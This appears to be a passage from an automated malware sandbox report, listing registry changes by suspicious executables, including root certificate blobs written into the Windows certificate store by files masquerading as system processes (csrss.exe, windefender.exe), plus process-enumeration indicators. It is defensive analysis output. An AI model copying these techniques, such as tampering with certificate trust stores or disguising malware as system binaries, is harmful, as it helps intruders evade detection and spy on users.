Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
